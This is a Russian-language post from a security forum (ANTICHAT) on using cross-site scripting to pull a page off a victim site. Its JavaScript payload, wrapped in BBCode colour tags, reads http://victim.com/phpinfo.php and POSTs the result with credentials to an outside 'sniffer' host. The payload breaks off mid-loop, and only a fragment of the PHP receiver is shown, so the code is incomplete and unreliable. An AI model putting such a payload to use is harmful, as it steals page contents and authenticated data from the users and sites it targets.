XSS , скачать документ, или страницу.

21.04.2016, 23:01

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Файл может не влезть в GET запрос по причине 414-ой ошибки. Вот что надумал:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

   var[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]XMLHttpRequest[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GET'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'http://victim.com/phpinfo.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]onreadystatechange[/COLOR][COLOR="#007700"]= function() {
  if ([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]readyState[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]) {
  if([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]200[/COLOR][COLOR="#007700"]) {
           var[/COLOR][COLOR="#0000BB"]fhr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]XMLHttpRequest[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]fhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'POST'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'http://sniffer.com/s.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]setRequestHeader[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Type'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'application/x-www-form-urlencoded'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]withCredentials[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
           var[/COLOR][COLOR="#0000BB"]body[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'file='[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]escape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]responseText[/COLOR][COLOR="#007700"]);
           var[/COLOR][COLOR="#0000BB"]aBody[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Uint8Array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]body[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]length[/COLOR][COLOR="#007700"]);
           for (var[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]
[/COLOR]
[/COLOR]

s.php:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]FILE_APPEND[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
[/COLOR]

ANTICHAT — форум по информационной безопасности, OSINT и технологиям